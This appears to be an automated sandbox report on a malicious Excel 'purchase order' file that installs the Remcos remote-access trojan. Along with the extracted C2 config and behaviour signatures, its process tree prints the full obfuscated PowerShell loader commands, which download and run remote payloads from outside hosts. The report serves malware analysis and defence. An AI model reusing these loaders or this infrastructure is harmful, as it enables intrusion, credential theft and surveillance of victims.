remcos | 9eb3ac05340da70c56dc36e8beece9a7c052c945fc3ceade2c622c4defec54b3

Analysis

max time kernel
148s
max time network
148s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
20-01-2025 10:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Purchase Order sheet.xls
Size

1.3MB
MD5

777464f57cb83a39b7324d1f7505b6d6
SHA1

25acb95ef77574c20002165e6b68526d7318acd1
SHA256

9eb3ac05340da70c56dc36e8beece9a7c052c945fc3ceade2c622c4defec54b3
SHA512

6609bfa04a5ae724eabd2f13c992a255554ae910ce6bcd6d25a62d8e2652d8aa129eae0908e266e3dfa808c19708a0a45c9b2922c531e03b1c2142847dbab8e3
SSDEEP

24576:pVH9M2HUO8Yfb3B/RvUp9EKDE/XY6lRvmfOdkGRjXv4cGysQYcb06hp8IJh1:LdMj/cb3I6Kg/ooofOdkGRXQcGTlczD

Score

10^/10

remcos zynova collection defense_evasion discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

zynova

millionairedreams2025.duckdns.org:14645

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-MGAETQ
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral1/memory/2824-227-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/2892-228-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/2556-232-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral1/memory/2892-228-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/memory/2824-227-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 5 IoCs

flow	pid	Process
20	1708	mshta.exe
21	1708	mshta.exe
23	1648	powershell.exe
25	1928	powershell.exe
26	1928	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
1648	powershell.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	CasPol.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1928	powershell.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1928 set thread context of 1028	1928	powershell.exe	42
PID 1028 set thread context of 2824	1028	CasPol.exe	43
PID 1028 set thread context of 2892	1028	CasPol.exe	44
PID 1028 set thread context of 2556	1028	CasPol.exe	45

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a190000000100000010000000fd960962ac6938e0d4b0769aa1a64e262000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2708	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1648	powershell.exe
1648	powershell.exe
1648	powershell.exe
1928	powershell.exe
2824	CasPol.exe
2824	CasPol.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
1028	CasPol.exe
1028	CasPol.exe
1028	CasPol.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1648	powershell.exe
Token: SeDebugPrivilege	1928	powershell.exe
Token: SeDebugPrivilege	2556	CasPol.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2708	EXCEL.EXE
2708	EXCEL.EXE
2708	EXCEL.EXE
2708	EXCEL.EXE
2708	EXCEL.EXE

Suspicious use of WriteProcessMemory 50 IoCs

description	pid	Process	procid_target
PID 1708 wrote to memory of 948	1708	mshta.exe	33
PID 1708 wrote to memory of 948	1708	mshta.exe	33
PID 1708 wrote to memory of 948	1708	mshta.exe	33
PID 1708 wrote to memory of 948	1708	mshta.exe	33
PID 948 wrote to memory of 1648	948	cmd.exe	35
PID 948 wrote to memory of 1648	948	cmd.exe	35
PID 948 wrote to memory of 1648	948	cmd.exe	35
PID 948 wrote to memory of 1648	948	cmd.exe	35
PID 1648 wrote to memory of 2252	1648	powershell.exe	36
PID 1648 wrote to memory of 2252	1648	powershell.exe	36
PID 1648 wrote to memory of 2252	1648	powershell.exe	36
PID 1648 wrote to memory of 2252	1648	powershell.exe	36
PID 2252 wrote to memory of 2256	2252	csc.exe	37
PID 2252 wrote to memory of 2256	2252	csc.exe	37
PID 2252 wrote to memory of 2256	2252	csc.exe	37
PID 2252 wrote to memory of 2256	2252	csc.exe	37
PID 1648 wrote to memory of 2084	1648	powershell.exe	39
PID 1648 wrote to memory of 2084	1648	powershell.exe	39
PID 1648 wrote to memory of 2084	1648	powershell.exe	39
PID 1648 wrote to memory of 2084	1648	powershell.exe	39
PID 2084 wrote to memory of 1928	2084	WScript.exe	40
PID 2084 wrote to memory of 1928	2084	WScript.exe	40
PID 2084 wrote to memory of 1928	2084	WScript.exe	40
PID 2084 wrote to memory of 1928	2084	WScript.exe	40
PID 1928 wrote to memory of 1028	1928	powershell.exe	42
PID 1928 wrote to memory of 1028	1928	powershell.exe	42
PID 1928 wrote to memory of 1028	1928	powershell.exe	42
PID 1928 wrote to memory of 1028	1928	powershell.exe	42
PID 1928 wrote to memory of 1028	1928	powershell.exe	42
PID 1928 wrote to memory of 1028	1928	powershell.exe	42
PID 1928 wrote to memory of 1028	1928	powershell.exe	42
PID 1928 wrote to memory of 1028	1928	powershell.exe	42
PID 1928 wrote to memory of 1028	1928	powershell.exe	42
PID 1928 wrote to memory of 1028	1928	powershell.exe	42
PID 1928 wrote to memory of 1028	1928	powershell.exe	42
PID 1028 wrote to memory of 2824	1028	CasPol.exe	43
PID 1028 wrote to memory of 2824	1028	CasPol.exe	43
PID 1028 wrote to memory of 2824	1028	CasPol.exe	43
PID 1028 wrote to memory of 2824	1028	CasPol.exe	43
PID 1028 wrote to memory of 2824	1028	CasPol.exe	43
PID 1028 wrote to memory of 2892	1028	CasPol.exe	44
PID 1028 wrote to memory of 2892	1028	CasPol.exe	44
PID 1028 wrote to memory of 2892	1028	CasPol.exe	44
PID 1028 wrote to memory of 2892	1028	CasPol.exe	44
PID 1028 wrote to memory of 2892	1028	CasPol.exe	44
PID 1028 wrote to memory of 2556	1028	CasPol.exe	45
PID 1028 wrote to memory of 2556	1028	CasPol.exe	45
PID 1028 wrote to memory of 2556	1028	CasPol.exe	45
PID 1028 wrote to memory of 2556	1028	CasPol.exe	45
PID 1028 wrote to memory of 2556	1028	CasPol.exe	45

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Purchase Order sheet.xls"
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2708

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1708
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C pOWErSheLL -eX bYPass -NOp -W 1 -c deVIceCreDeNTialDePlOyMent.eXe ; INVoke-eXPreSsIOn($(INVoke-EXprEsSIoN('[SySTeM.tEXT.eNCOdinG]'+[CHaR]58+[ChaR]58+'uTf8.GEtStRinG([SySTEM.conVErt]'+[CHar]58+[chAr]0x3a+'fROmbaSE64StRINg('+[chAr]34+'JGdqUnh0USAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1CZXJkZUZJbklUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlscWVNcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUlpLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5bm8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbFUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRWSmJXenhxdmwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlB0dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIWnpOcERwU0VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRnalJ4dFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS43L3hhbXBwL2trYi9uaWNlZ2lybHdhbnRtZXRva2lzc2hlcmxpcHN3ZWxsd2l0aG15bGlwcy50SUYiLCIkZW5WOkFQUERBVEFcbmljZWdpcmx3YW50bWV0b2tpc3NoZXJsaXBzd2VsbHdpdGhteWxpcC52YlMiLDAsMCk7U3RBUlQtU2xlZXAoMyk7U1RhcnQtcHJPQ2VTcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pY2VnaXJsd2FudG1ldG9raXNzaGVybGlwc3dlbGx3aXRobXlsaXAudmJTIg=='+[ChAr]0x22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:948
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOWErSheLL -eX bYPass -NOp -W 1 -c deVIceCreDeNTialDePlOyMent.eXe ; INVoke-eXPreSsIOn($(INVoke-EXprEsSIoN('[SySTeM.tEXT.eNCOdinG]'+[CHaR]58+[ChaR]58+'uTf8.GEtStRinG([SySTEM.conVErt]'+[CHar]58+[chAr]0x3a+'fROmbaSE64StRINg('+[chAr]34+'JGdqUnh0USAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1CZXJkZUZJbklUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlscWVNcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUlpLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5bm8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbFUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRWSmJXenhxdmwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlB0dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIWnpOcERwU0VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRnalJ4dFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS43L3hhbXBwL2trYi9uaWNlZ2lybHdhbnRtZXRva2lzc2hlcmxpcHN3ZWxsd2l0aG15bGlwcy50SUYiLCIkZW5WOkFQUERBVEFcbmljZWdpcmx3YW50bWV0b2tpc3NoZXJsaXBzd2VsbHdpdGhteWxpcC52YlMiLDAsMCk7U3RBUlQtU2xlZXAoMyk7U1RhcnQtcHJPQ2VTcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pY2VnaXJsd2FudG1ldG9raXNzaGVybGlwc3dlbGx3aXRobXlsaXAudmJTIg=='+[ChAr]0x22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1648
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\amaiznfh.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2252
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFB.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFA.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2256
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicegirlwantmetokissherlipswellwithmylip.vbS"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2084
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA4ADgAMwAvADQAMgAzAC8AbwByAGkAZwBpAG4AYQBsAC8AbgBlAHcAXwBpAG0AYQBnAGUALgBqAHAAZwA/ADEANwAzADcAMQAyADQAOQA4ADAAJwA7ACAAdAByAHkAIAB7ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACAAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACAAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACAAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACAAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACAAaQBmACAAKAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAApACAAewAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACAAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJABtAGUAdABoAG8AZAAgAD0AIABbAFIAdQBtAHAALgBDAGwAYQBzAHMAOQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAHMAbQBlAHQAaABvAGQAXwAyACcAKQA7ACAAJABtAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdAEAAKAAnAHQAeAB0AC4AcwBnAG4AaQBoAHQAeQByAGUAdgBlAHIAbwBmAGwAawB1AGYAaQB0AHUAYQBlAGIAeQByAGUAdgBlAHIAYQBzAGwAcgBpAGcAdABoAGcAaQBuAC8AYgBrAGsALwBwAHAAbQBhAHgALwA3AC4ANQAxADIALgAwADEAMgAuADIAOQAxAC8ALwA6AHAAdAB0AGgAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBmAGEAbABzAGUAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBDAGEAcwBQAG8AbAAnACwAJwBmAGEAbABzAGUAJwApACkAOwAgAH0AIAB9ACAAYwBhAHQAYwBoACAAewAgAFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAJwBFAHIAcgBvADoAIAAkAF8AJwA7ACAAfQA=')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1928
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:1028
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\zlcxyltfyxm"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2824
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\bfphrdegmfeclx"
        7⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:2892
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\lhuasvpaanwhodonm"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2556

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\75CA58072B9926F763A91F0CC2798706_056B48C93C4964C2E64C0A8958238656

Filesize
1KB

MD5
c5dba2abd9ab5468e618a9124c2bd65f

SHA1
435a62b654a8fb4f397616bd2e06a9fde20ff5f4

SHA256
120beb84bc52c23dab3e8e6b6f706cf035672b84c9cc3dc926b6153c8daa6d21

SHA512
2edcc29e9f30cf8020f30d1d650bce5e0cf5f93325102909c375da9f57e2833ba4f54787a29e7223cd1e3ef834b291051ffcb60192501d617be6c648f4a17cfb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62

Filesize
2KB

MD5
049553456ddd48b7242d9040fa99ad18

SHA1
817919890dfc8d1c6f20384b920bff3ffa4d9040

SHA256
ffea61f4c3df0fcd7724353e4cd0b86dbdf6971675aac4535041535ab128e9fc

SHA512
4e2d74399cdf00a472686cc9dda145f3cc80072e2dfa54b05e3b235664b3390edbfa6a17cc6c15e563c71db815920e47efc52e27c212dc3c0ea84d7756f5c2dc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894

Filesize
1KB

MD5
8b9ea7a68d9d98767ffcda8731a74c6f

SHA1
a423e05cf667374c54c4f266b82667846e230fc5

SHA256
dd7820ad99747cca355ebdc71bcac0f800c0970f7871ef7be24ba742b202a70f

SHA512
c9df791dae01b6522ec4d99d891a1638a9ffb000a060ba908a0a1542e536e3d2b3287cd1b1af244be4f3a34c3940fc0124c7151fa404062d409934a76c592c2c

Download Submit
